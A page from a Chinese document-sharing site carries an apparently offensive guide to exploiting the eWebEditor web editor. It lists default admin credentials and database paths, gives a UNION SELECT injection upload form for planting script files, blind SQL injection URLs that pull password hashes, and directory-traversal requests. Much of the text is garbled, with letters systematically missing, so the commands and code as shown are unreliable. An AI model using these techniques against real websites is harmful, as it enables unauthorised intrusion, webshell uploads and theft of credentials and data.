- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
ewebeditor漏洞利用总结.doc
ewebeditor漏洞利用总结
eebeditr漏洞利用总结
先从最基本的记录起!通常入侵eebeditr编辑器的步骤如下:
1、首先访问默认管理页看是否存在。
默认管理页地址2.80以前为 eebeditr/adin_lgin.asp 以后版本为adin/lgin.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)
2、默认管理帐号密码!
默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: adin adin888 !常用的密码还有adin adin999 adin1 adin000 之类的。
3、默认数据库地址。
如果密码不是默认的。我们就访问是不是默认数据库!尝试下载数据库得到管理员密码!管理员的帐号密码,都在eebEditr_Syste表段里,sys_UserNae Sys_UserPass 都是d5加密的。得到了加密密码。可以去 /eebeditr/uplad.asp?atin=saveap;type=IAGEap;style=standardunin selet S_ID,S_Nae,S_Dir,S_SS,S_UpladDir,S_idth,S_Height,S_e,S_IsSys,S_FileExt,S_FlashExt, [S_IageExt]%2b|er,S_ediaExt,S_FileSize,S_FlashSize,S_IageSize,S_ediaSize,S_StateFlag,S_DetetFrrd,S_Initde,S_BaseUrl fr eebeditr_style here s_nae=standardanda=a ethd=pst nae=yfr entype=ultipart/fr-data
input type=file nae=upladfile size=100brbr
input type=subit value=Fuk
/fr
--------------------------------------------------------------------------------------------------------------
以上代码令存为htl!修改红色部分的路径,然后自动上传 .er 文件!漏洞原因是因为sStyleNae变量直接从style中读取,并没有过滤,所以可以包含任意字符!用selet在eebeditr_style表中查找s_nae为sStyleNae的记录,找不到就提示出错!在sStyleNae变量中用unin来构造记录,我们可以在sAllExt中加入|er、|asa等!
另外还有一些版本的eebeditr的uplad.asp文件存在注入漏洞!贴几个注入用的url!信息错误则返回脚本出错的提示,在浏览器左下角!具体利用如下:
eebeditr/Uplad.asp?type=FILEap;style=standard_lblue1and%20(selet%20tp%201%20as(id(sys_userpass,15,1))%20fr%20eebeditr_syste%20)98%20and%201=1
注意修改红色部分的字段名、位数、asii码的值!
7、目录遍历漏洞!
这里大概说一下!目录遍历漏洞基本存在于eebeditr/adin_upladfile.asp 高版本的是eebeditr/adin/uplad.asp 文件!这个文件有的不需要登陆验证,有些需要!很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改!这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!这些都自由发挥了!说下漏洞利用方法!
漏洞利用方式如下:在上传文件管理页面 随便选择一个上传样式!比如eebeditr/adin_upladfile.asp?id=14 在id后面添加ap;dir=../..
类似如下:ebeditr/adin_upladfile.asp?id=14ap;dir=../../../../data/ 可以看到网站数据库的路径!
另外一个遍历目录的漏洞文件是 eebeditr/asp/brse.asp
漏洞代码为 :
Funtin GetList()
Di s_List, s_Url
s_List =
Di FS, UpladFlder, UpladFiles, UpladFile, sFileNae
Respnse.rite surrDir
n Errr Resue Next
Set FS = Server.reatebje
原创力文档


文档评论(0)